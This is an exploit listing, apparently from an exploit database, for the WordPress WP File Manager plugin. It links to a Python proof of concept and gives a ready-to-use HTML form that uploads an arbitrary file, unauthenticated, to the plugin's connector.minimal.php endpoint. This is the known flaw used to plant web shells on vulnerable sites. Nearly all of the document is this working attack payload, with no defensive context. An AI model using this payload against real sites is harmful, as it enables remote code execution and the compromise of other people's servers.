Share
## https://sploitus.com/exploit?id=WPEX-ID:10389
https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py

<html>
<body>
  <form method="POST" enctype="multipart/form-data" action="https://example.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php">
    <input type="hidden" name="cmd" value="upload"/>
    <input type="hidden" name="target" value="l1_Lw"/>
    <input type="file" name="upload[]"/><br/><br/>
    <input type="submit" value="Upload"/>
  </form>
</body>